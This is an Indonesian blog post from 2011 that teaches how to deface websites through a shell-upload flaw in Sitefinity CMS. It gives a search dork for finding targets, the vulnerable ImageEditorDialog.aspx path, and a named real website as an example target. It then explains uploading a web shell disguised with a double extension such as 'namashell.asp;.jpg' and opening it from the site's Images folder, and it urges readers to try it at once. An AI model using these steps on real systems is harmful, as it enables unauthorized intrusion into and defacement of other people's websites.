Kotak Penelusuran

Translator


English French German Spain Italian Dutch Russian Portuguese Japanese Korean Indonesia Chinese Simplified

Jumat, 28 Oktober 2011

Deface dengan metode Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Credit : Krokolatoz 
 
Dork : "Sitefinity: Login"
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

pertama kamu cari dlu target webnya dengan dork nya.,,
jika target sudah ketemu,masukan exploitnya..
contoh target http://www.mapmart.com/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
Code:
http://www.mapmart.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Spoiler for liat gambar:

jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif)
Spoiler for liat gambar:


jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view original size"..
maka hasilnya seperti ini http://www.mapmart.com/Images/z.asp;.jpg
cukup simple bukan .. ???
langsung coba dah gan gk perlu pake bengong ..

0 komentar:

Site Meter

Label

Iklan

Blogger Themes


BLOG BERGETAR SAAT DI KLIK KANAN

NEW Flags Country

free counters
Home RC Home RC Home RC| Home RC| ™Ramnit-CLCZ BLoG™: Deface dengan metode Sitefinity CMS (ASP.NET) Shell Upload Vulnerability